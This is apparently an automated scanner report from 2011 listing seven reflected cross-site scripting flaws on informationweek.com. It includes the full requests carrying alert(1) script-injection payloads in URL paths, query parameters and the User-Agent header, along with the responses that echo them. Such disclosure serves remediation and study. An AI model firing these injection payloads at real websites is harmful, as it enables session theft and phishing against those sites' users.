XSS, informationweek.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 28 05:37:59 CST 2011.


Loading

1. Cross-site scripting (reflected)

1.1. http://www.informationweek.com/GLOBAL/apps/articles/getWordValidationImage_ISO.jhtml [REST URL parameter 2]

1.2. http://www.informationweek.com/GLOBAL/apps/articles/getWordValidationImage_ISO.jhtml [REST URL parameter 3]

1.3. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [articleID parameter]

1.4. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [articleID parameter]

1.5. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [cid parameter]

1.6. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [name of an arbitrarily supplied request parameter]

1.7. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [User-Agent HTTP header]



1. Cross-site scripting (reflected)
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.informationweek.com/GLOBAL/apps/articles/getWordValidationImage_ISO.jhtml [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.informationweek.com
Path:   /GLOBAL/apps/articles/getWordValidationImage_ISO.jhtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6645b"><a>87c0cfc260b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /GLOBAL/apps6645b"><a>87c0cfc260b/articles/getWordValidationImage_ISO.jhtml HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=229200155&cid=RSSfeed_IWK_News
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=R01GJLA2PL02ZQE1GHPCKH4ATMY32JVN

Response

HTTP/1.1 404 Not Found
Date: Tue, 15 Feb 2011 21:43:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Tue, 15 Feb 2011 21:43:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 29915


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL/apps6645b"><a>87c0cfc260b/articles/getWordValidatio;kvarticleid=;kvauthor=;loc=300;grp=662454524" target="_blank">
...[SNIP]...

1.2. http://www.informationweek.com/GLOBAL/apps/articles/getWordValidationImage_ISO.jhtml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.informationweek.com
Path:   /GLOBAL/apps/articles/getWordValidationImage_ISO.jhtml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fba5"><a>9c0680389fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /GLOBAL/apps/articles1fba5"><a>9c0680389fb/getWordValidationImage_ISO.jhtml HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=229200155&cid=RSSfeed_IWK_News
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=R01GJLA2PL02ZQE1GHPCKH4ATMY32JVN

Response

HTTP/1.1 404 Not Found
Date: Tue, 15 Feb 2011 21:43:30 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Tue, 15 Feb 2011 21:43:30 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 29915


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL/apps/articles1fba5"><a>9c0680389fb/getWordValidatio;kvarticleid=;kvauthor=;loc=300;grp=137042293" target="_blank">
...[SNIP]...

1.3. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [articleID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea7df'%3balert(1)//91d0c0459be was submitted in the articleID parameter. This input was echoed as ea7df';alert(1)//91d0c0459be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/security/vulnerabilities/showArticle.jhtml?articleID=229200155ea7df'%3balert(1)//91d0c0459be&cid=RSSfeed_IWK_News HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 15 Feb 2011 21:43:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Tue, 15 Feb 2011 21:43:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=N21NVENJZUCTHQE1GHPCKHWATMY32JVN; path=/
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33517


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_Vulnerabilities_Welcome_Ad_1x1;key=229200155ea7df';alert(1)//91d0c0459be+/news/security/vulnerabilities/showArticle/dhandler;kvarticleid=229200155ea7df';alert(1)//91d0c0459be;kvauthor=;loc=100;target=_blank;grp=45272018;misc='+new Date().getTime()+'">
...[SNIP]...

1.4. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [articleID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 519e8"><script>alert(1)</script>4642e4bf25f was submitted in the articleID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security/vulnerabilities/showArticle.jhtml?articleID=229200155519e8"><script>alert(1)</script>4642e4bf25f&cid=RSSfeed_IWK_News HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 15 Feb 2011 21:43:23 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Tue, 15 Feb 2011 21:43:23 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=DH3IQYSBS1Y2RQE1GHRSKH4ATMY32JVN; path=/
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33954


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<link rel="canonical" href="http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=229200155519e8"><script>alert(1)</script>4642e4bf25f"/>
...[SNIP]...

1.5. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c7a1"><script>alert(1)</script>f8df28bab65 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security/vulnerabilities/showArticle.jhtml?articleID=229200155&cid=RSSfeed_IWK_News2c7a1"><script>alert(1)</script>f8df28bab65 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 15 Feb 2011 21:43:28 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Tue, 15 Feb 2011 21:43:28 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=GJNJYZJVVDSUZQE1GHRSKH4ATMY32JVN; path=/
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 88045


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
<input type="hidden" value="/news/security/vulnerabilities/showArticle.jhtml?articleID=229200155&cid=RSSfeed_IWK_News2c7a1"><script>alert(1)</script>f8df28bab65#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" />
...[SNIP]...

1.6. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca68"><script>alert(1)</script>0406ffdc05e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security/vulnerabilities/showArticle.jhtml?articleID=229200155&cid=RSSfeed_IWK_News&2ca68"><script>alert(1)</script>0406ffdc05e=1 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 15 Feb 2011 21:43:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Tue, 15 Feb 2011 21:43:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=4ZO3E0LUB5N4PQE1GHRSKHWATMY32JVN; path=/
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 88180


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
<input type="hidden" value="/news/security/vulnerabilities/showArticle.jhtml?articleID=229200155&cid=RSSfeed_IWK_News&2ca68"><script>alert(1)</script>0406ffdc05e=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" />
...[SNIP]...

1.7. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [User-Agent HTTP header]  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /news/security/vulnerabilities/showArticle.jhtml

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c7f6"-alert(1)-"a8c7d78a304 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/security/vulnerabilities/showArticle.jhtml?articleID=229200155&cid=RSSfeed_IWK_News HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: 7c7f6"-alert(1)-"a8c7d78a304
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 15 Feb 2011 21:43:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Tue, 15 Feb 2011 21:43:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=0D22MRP2WEZNNQE1GHPCKHWATMY32JVN; path=/
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 87839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<t
...[SNIP]...
pp Vulnerabilities";
s.prop5="Technology/Telecom | Industry | Security | Security | Vulnerabilities and threats | Development";
s.prop6="";
s.prop7="Mathew J. Schwartz";
s.prop8="173.193.214.243 | 7c7f6"-alert(1)-"a8c7d78a304";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop21="";

/* Conversion Variables */
s.campaign="";
s.state="";
s.zip=""
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Mon Feb 28 05:37:59 CST 2011.